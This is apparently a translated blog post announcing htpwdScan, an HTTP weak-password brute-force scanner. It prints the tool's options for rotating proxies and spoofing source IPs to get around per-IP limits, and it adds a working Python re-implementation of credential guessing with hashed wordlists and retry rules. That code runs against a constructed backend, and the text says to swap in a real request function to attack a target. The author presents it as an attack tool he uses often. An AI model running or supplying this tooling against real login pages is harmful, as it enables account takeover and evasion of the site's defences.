htpwdScan: an HTTP weak-password scanner (Python)

The script is still being improved. It can already get around per-IP rate limits by loading a batch of proxies, and password dictionaries can be hashed on the fly with MD5 or SHA1.

Retry conditions can be set to cope with unstable hosts and with nginx routing requests to different backends: even if only one request in four actually reaches the login backend, the program can still crack the account.

Support for HTTP Basic authentication is being added; I am also considering simple CAPTCHA recognition and a GUI front end. Ah, I am getting off track.

Weak-password cracking is one of the attack techniques I use most often. Against systems with a large user base, no per-IP request limiting, no password-complexity rules and overly detailed error messages, it works almost every time.

Last week I took some time to consolidate the brute-force script fragments I had written before into a general-purpose HTTP brute-force tool. Thanks to my teammates Xiaosong and Liang-ge for supporting this work.

Since this is an initial implementation, there are surely many shortcomings. I added whatever came to mind, so the design may be a bit scattered.

Current command-line options (the tool's own help output):

    optional arguments:
      -h, --help            show this help message and exit
      -f REQUESTFILE        Load HTTP request from file
      -https                Set -https only when load request from file and
                            HTTPS was enabled
      -u REQUESTURL         Explicitly Set request URL, e.g.
                            -u="http://www.test.com/login.php"
      -m METHOD             Set -m=GET only when -u was set and request method
                            is GET, default is POST
      -d Param=DictFilePath [Param=DictFilePath ...]
                            set dict file for each parameter,
                            support hash functions like md5, md5_16, sha1. e.g.
                            -d user=users.dic pass=md5(pass.dic)
      -no302                302 redirect insensitive, default is sensitive
      -err ERR [ERR ...]    String indicates fail in response text, e.g.
                            -err "user not exist" "password wrong"
      -suc SUC [SUC ...]    String indicates success in response text, e.g.
                            -suc "welcome," "admin"
      -herr HERR            String indicates fail in response headers
      -hsuc HSUC            String indicates success in response headers
      -proxy Server:Port    Set HTTP proxies, e.g.
                            -proxy=127.0.0.1:8000,8.8.8.8:8000
      -proxylist ProxyListFile
                            Load HTTP proxies from file, one proxy per line, e.g.
                            -proxylist=proxys.txt
      -fip                  Spoof source IP
      -t THREADS            50 threads by default
      -o OUTPUT             Output file, default is Cracked_Pass.txt
      -rtxt RetryText       Retry when it appears in response text,
                            e.g. -rtxt="IP blocked"
      -rntxt RetryNoText    Retry when it does not appear in response text,
                            e.g. -rntxt=""
      -rheader RetryHeader  Retry when it appears in response headers,
                            e.g. -rheader="Set-Cookie:"
      -rnheader RetryNoHeader
                            Retry when it does not appear in response headers,
                            e.g. -rnheader="Content-Length:"
      -sleep SECONDS        Sleep some time after each request,
                            avoid IP blocked by web server
      -debug                Send a request and check
                            response headers and response text
      -nov                  Do not print verbose info, only print the cracked ones
      -v                    show program's version number and exit
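To make the two mechanisms described above concrete (hashed password dictionaries as in `-d pass=md5(pass.dic)`, and retry rules that let the scanner crack an account even when nginx sends only one request in four to the real backend), here is a small re-implementation written for this page. It is an added example, not htpwdScan's own code: the function names, the `FlakyBackend` stand-in, the wordlists and the definition of `md5_16` as the middle 16 hex characters of the MD5 digest are all this example's assumptions. It runs offline; swap `backend.send` for a real HTTP request function to use it against a target.

```python
"""Added example, not htpwdScan's own code. Two ideas from the post:
(1) hashed password wordlists (md5 / md5_16 / sha1, the `-d pass=md5(pass.dic)` syntax);
(2) a retry loop that re-sends a guess while the response matches a retry rule
    (`-rtxt` / `-rntxt` / `-rheader` / `-rnheader`), so a flaky nginx that routes
    only 1 of 4 requests to the real login handler still gets cracked.
All names, the fake backend and the md5_16 definition are this example's assumptions."""
import hashlib
import itertools
import re

HASHERS = {
    "md5": lambda s: hashlib.md5(s.encode()).hexdigest(),
    "md5_16": lambda s: hashlib.md5(s.encode()).hexdigest()[8:24],   # assumed: middle 16 hex chars
    "sha1": lambda s: hashlib.sha1(s.encode()).hexdigest(),
}
SPEC_RE = re.compile(r"^(?:(?P<func>\w+)\((?P<inner>[^()]+)\)|(?P<plain>.+))$")


def parse_dict_spec(spec):
    """'md5(pass.dic)' -> ('pass.dic', md5 hasher); 'users.dic' -> ('users.dic', None)."""
    m = SPEC_RE.match(spec)
    if m is None:
        raise ValueError("bad dict spec: %r" % spec)
    if m.group("func"):
        if m.group("func") not in HASHERS:
            raise ValueError("unsupported hash function: " + m.group("func"))
        return m.group("inner"), HASHERS[m.group("func")]
    return m.group("plain"), None


def transform(words, hasher):
    """Apply the wordlist's hash function (if any) to every candidate."""
    return [hasher(w) if hasher else w for w in words]


def classify(body, headers, err=(), suc=(), rtxt=(), rntxt=(), rheader=(), rnheader=()):
    """Decide 'retry', 'success' or 'fail' for one response.
    Retry rules are checked first: a reply that never reached the login handler
    must not be counted as a failed (or successful) attempt."""
    hdr_text = "\n".join("%s: %s" % kv for kv in headers.items())
    if any(t in body for t in rtxt) or any(t not in body for t in rntxt):
        return "retry"
    if any(h in hdr_text for h in rheader) or any(h not in hdr_text for h in rnheader):
        return "retry"
    if any(t in body for t in err):
        return "fail"
    if any(t in body for t in suc):
        return "success"
    if err and not suc:          # only a failure indicator was configured and it did not fire
        return "success"
    return "fail"


def try_login(send, user, password, max_retries=8, **rules):
    """Send one guess; re-send while the reply looks like it never reached the
    login handler. Returns (verdict, attempts used)."""
    for attempt in range(1, max_retries + 1):
        body, headers = send(user, password)
        verdict = classify(body, headers, **rules)
        if verdict != "retry":
            return verdict, attempt
    return "retry", max_retries   # gave up: host unreachable or IP blocked


def crack(send, users, passwords, **rules):
    """Try every user/password combination and return the ones that logged in."""
    return [(u, p) for u, p in itertools.product(users, passwords)
            if try_login(send, u, p, **rules)[0] == "success"]


class FlakyBackend:
    """Constructed stand-in for a site behind a mis-routing nginx: only every 4th
    request reaches the real login handler, the rest get nginx's default page.
    The handler expects the client-side MD5 of the password, as many sites do."""

    def __init__(self, valid_md5):
        self.valid = valid_md5    # {user: md5(password)}
        self.calls = 0

    def send(self, user, password):
        self.calls += 1
        if self.calls % 4:
            return "<html>Welcome to nginx!</html>", {"Server": "nginx"}
        if self.valid.get(user) == password:
            return "welcome, " + user, {"Set-Cookie": "sid=abc"}
        return "user not exist or password wrong", {}


# Equivalent of: -err "password wrong" -suc "welcome," -rtxt "Welcome to nginx"
RULES = dict(err=["password wrong"], suc=["welcome,"], rtxt=["Welcome to nginx"])


def demo():
    """Constructed wordlists: one real credential (admin / 123456) among decoys."""
    backend = FlakyBackend({"admin": HASHERS["md5"]("123456")})
    _, hasher = parse_dict_spec("md5(pass.dic)")      # password dict is MD5-hashed before sending
    passwords = transform(["password", "123456", "admin888"], hasher)
    return crack(backend.send, ["admin", "guest"], passwords, **RULES)


if __name__ == "__main__":
    print(demo())   # [('admin', 'e10adc3949ba59abbe56e057f20f883e')]
```

The ordering in `classify` is the point worth copying: retry conditions are evaluated before the success and failure strings, so a wrong-backend page is re-sent rather than silently counted as "password wrong", and the real answer is only accepted once a reply that does not match any retry rule comes back. With the one-in-four backend above, every guess costs exactly four requests and the admin credential is still recovered.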

获取脚本: https://github.com/lijiejie/htpwdScan

Basic usage will be explained in a separate post later. A small tool one writes oneself is naturally no good if it is only handy for its author...
